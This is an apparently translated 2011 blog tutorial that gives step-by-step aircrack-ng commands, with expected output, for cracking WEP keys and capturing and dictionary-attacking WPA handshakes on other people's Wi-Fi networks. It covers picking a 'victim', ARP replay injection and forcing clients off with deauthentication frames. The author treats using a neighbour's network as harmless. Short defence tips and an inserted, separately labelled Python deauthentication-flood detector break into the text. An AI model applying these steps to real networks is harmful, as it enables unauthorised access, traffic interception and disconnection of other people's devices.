The attack on the wireless network: a little less theory and a little more practice
16 March 2011, 13:17

In general, the theory and the attack process are well described by user n3m0 in the articles "Attacks on wireless networks", so I will not dwell on the many theoretical aspects.
I want to describe the simplest ways of getting around the protection, but in more detail.


-1. A couple of words from me


I want to say that I am categorically against abusing such actions. Even in large cities "unlimited internet" now largely rules (which is why my conscience is clear and I sleep peacefully), but it is still not worth misbehaving and abusing this, especially as it can backfire, as I write below... Otherwise, well, I do not see anything wrong with it, and I think such actions are equivalent to warming yourself in winter on someone else's radiator)))

I will not discuss all the nuances and pitfalls that may be encountered along the way; those who want to will figure them out themselves, and the others will sleep better at night :)

I also want to note that I am not a "cool hacker" and am not in any way connected with wireless networks or information security. It is just that after buying a netbook this topic became relevant and interesting for me, and that prompted me to dig into it. Well, now I want to share it with the Habr public.

This is my first article, so do not hit too hard :))
Here we go!


0. Stocking up on the basic software


There are many programs for this kind of thing, but we will use the Aircrack-ng package, which already has everything we need. The program is developed under Linux; there is also a version for Windows, but as I understand it, it is not specifically supported and does not really work)))


Download and build the latest version available at the moment, rc3 (from 26.03.09):

wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz
tar -zxvf aircrack-ng-1.0-rc3.tar.gz
cd aircrack-ng-1.0-rc3
make
make install

UPD.
If you do not want to bother with the source, it is possible to get aircrack-ng from the repositories of your distribution. For example, the Ubuntu 8.10 repositories currently carry version rc2, which can be downloaded and installed with the command:

sudo apt-get install aircrack-ng

However, the developers recommend using the latest version, as it fixes many bugs and adds many improvements.


1. Collecting information


First we need to put our wi-fi card into monitor mode.
In my case (the Madwifi-ng driver) this is done like so:

sudo wlanconfig ath0 destroy
sudo wlanconfig ath0 create wlandev wifi0 wlanmode monitor

Now we need a program to monitor all wireless networks within range of our Wi-Fi adapter. Personally I like to use Airodump-ng from the Aircrack-ng package we downloaded earlier.

Run airodump, passing the one required parameter, the interface name (in this case ath0):

sudo airodump-ng ath0
What do we see? Our card switches from channel to channel and displays all activity within our reach. The top half shows the discovered access points, the bottom half the discovered clients (in this case 3 clients were found, none of which is connected anywhere):



It only seems at first glance that the table is unclear; in fact it is all simple. Here are the basic values we are interested in:

  • BSSID - MAC address of the access point
  • PWR - signal level
  • # Data - the number of captured data packets
  • CH - the channel number on which the access point operates
  • MB - data transfer rate
  • ENC - encryption algorithm
  • CIPHER - encryption type
  • AUTH - type of authentication
  • ESSID - access point name
  • STATION - MAC address of the client
  • Probes - the names of networks the client tried to connect to


2. Choosing a victim :D


So, what do we have? To proceed, we need to choose our victim...

To start with, a very important criterion is the signal level. If the signal is below 5-10, nothing good will come of interacting with this network...

Next, look at the encryption algorithm (ENC):

  • OPN - a network without encryption... nice of course, but not interesting :)
  • WEP - a network with WEP encryption... in fact, such networks are of the greatest interest to us
  • WPA/WPA2 - you will not believe it! a network with WPA/WPA2 encryption :)))

As I wrote above, we are mostly interested in networks with WEP encryption, so let us begin with them...


3. Hi WEP!


I will not describe how to cope with SSID cloaking, MAC filtering and other possible obstacles; it is enough to read n3m0's articles or the aircrack documentation, so let's get straight to business.

Without going into details, cracking a WEP network comes down to collecting enough packets, so you can just sit and wait patiently until the right amount accumulates by itself, but if there is no activity between the access point and a client, you can sit like that for a week... Therefore the packets will be generated not without our help :)

So let us begin:

The following example is taken from the aircrack-ng.org site. The network being cracked has the name (essid) teddy, the MAC address (bssid) 00:14:6C:7E:40:80, and "lives" on channel 9. All this data we get using airodump (see section 1, "Collecting information").

Run airodump aimed at the selected network: on channel 9, with the access point's address, and with the name of the file to which captured packets will be written:

sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

Next, in a new terminal run aireplay to "make friends" with the access point:

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

where:
-e teddy - the name of the network
-a 00:14:6C:7E:40:80 - MAC of the access point
-h 00:0F:B5:88:AC:82 - our MAC

The output should be:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

Now you can start generating bogus traffic; again, open a new window:

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Ideally the output should look something like this:

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

Now switch to the window in which airodump is running and contemplate the rapidly growing (given an adequate signal level) packet count. Usually 20,000 packets are enough to find a 64-bit key.

When the required number of packets, shown by airodump in the "# Data" column, has been collected, run aircrack-ng and enjoy the process of finding the password:

aircrack-ng -z output*.cap

UPD.
The password is in most cases returned in hexadecimal format, because most routers store the password in HEX, each in its own way, so translating the value back into ASCII is often not possible, although in some cases the original password is written in brackets next to it.

That's all. This password can simply be entered, only with the colons removed.
Under favourable conditions there is absolutely nothing complicated :)
If the password is not found, as aircrack will tell us, most likely we need to capture some more packets, for example 40,000.


4. Inaccessible WPA/WPA2


In this case it all looks much simpler, but the final result is much harder to reach.

To begin, as usual, run airodump aimed at the selected network...
In the case of WPA/WPA2, collecting packets will not get us anywhere; we need a client connected to the network, or, to be more precise, we must catch the moment a client connects to the network. If there is no client, we sit and wait...

If a client is already connected, run aireplay and terminate its authentication, thereby forcing it to connect again:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

where:
-a 00:14:6C:7E:40:80 - MAC of the access point
-c 00:0F:B5:FD:FB:C2 - MAC of the client

And the output will be:

11:09:28 Sending DeAuth to station - STMAC: [00:0F:B5:34:30:30]

Ideally we should get the so-called handshake, about which airodump will again notify us by displaying at the very top right the message «WPA handshake: 00:14:6C:7E:40:80».
If this does not happen, use aireplay again.

Once the handshake is caught, run aircrack, but this time with a dictionary:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 output*.cap

In this case the result depends on whether the required password is in our dictionary, so our chances are directly proportional to the size and quality of the dictionary...
Dictionaries are easily found on the internet, and a small one also ships in the aircrack-ng archive :)


5. A few words about defence


A few tips for those who absolutely do not want to let outsiders into their trough:
  • do not use WEP; switch completely to WPA2 and the more sophisticated protocols and add-ons built on top of it
  • do not use the minimum allowed password length; the longer the better
  • use a unique password with uppercase and lowercase letters...
  • no dates (for example, all dates in DDMMYYYY format from 01.01.1950 to 01.01.2010 are run through in a minute)
  • use SSID cloaking and MAC filtering; only a little, but it will help
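As an added defensive illustration (not part of the original article), here is a small Python detector for the forced-reconnect trick from section 4: it parses raw 802.11 management frames (the radiotap header is assumed to be already stripped) and flags an access point/client pair that sees a burst of deauthentication or disassociation frames, something a legitimate access point almost never sends. The frame bytes, the third MAC address and the helper build_frame are constructed for this example; the two other addresses are the ones used above.

```python
import struct
from collections import defaultdict
MGMT_TYPE = 0
SUBTYPE_BEACON, SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 0x8, 0xA, 0xC

def mac_str(raw):
    return ":".join(f"{b:02X}" for b in raw)

def parse_80211(frame):
    """Parse a raw 802.11 header (radiotap already stripped: assumption); None if not management."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != MGMT_TYPE:
        return None
    info = {"subtype": (fc0 >> 4) & 0xF, "dst": mac_str(frame[4:10]),
            "src": mac_str(frame[10:16]), "bssid": mac_str(frame[16:22])}
    if info["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH) and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]  # little-endian reason code
    return info

def build_frame(subtype, dst, src, bssid, reason=None):
    """Build a constructed management frame for testing; not a real capture."""
    hdr = struct.pack("<BBH", (subtype << 4) | (MGMT_TYPE << 2), 0, 0)  # frame control, duration
    for m in (dst, src, bssid):
        hdr += bytes.fromhex(m.replace(":", ""))
    hdr += struct.pack("<H", 0)  # sequence control
    if reason is not None:
        hdr += struct.pack("<H", reason)
    return hdr

def detect_deauth_flood(capture, window=5.0, threshold=4):
    """capture: list of (timestamp_seconds, frame_bytes). Flags (bssid, target) pairs that
    see more than `threshold` deauth/disassoc frames within any `window` seconds."""
    events = defaultdict(list)
    for ts, frame in capture:
        info = parse_80211(frame)
        if info and info["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            events[(info["bssid"], info["dst"])].append(ts)
    flagged = {}
    for key, times in events.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[key] = peak
    return flagged
```

A real deployment would feed it frames from a monitor-mode capture and tune window and threshold to the traffic of the network being watched.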


6. Conclusion


That seems to be all...
These were the simplest ways of getting around and of strengthening the protection, but even they do not always work.
For those who want to know more, I advise visiting the site http://www.aircrack-ng.org/

As a result, we found that WEP is the protocol most favourable for cracking. My personal record is about 5-7 minutes :)
But this does not mean that everyone should blindly run off and switch to WPA2... experience shows that most people do not even know how to install Windows, so there is really nothing to say about hacking wi-fi :)))

Once again I want to say something about abuse. If even the moral and ethical side of the issue does not stop you, keep in mind that under certain circumstances you may lose many of your passwords (icq, contacts, etc.)... this also applies to fans of enjoying open wi-fi networks... But that is what I will write about in the next article. I hope it was interesting :)
Added by: w1zard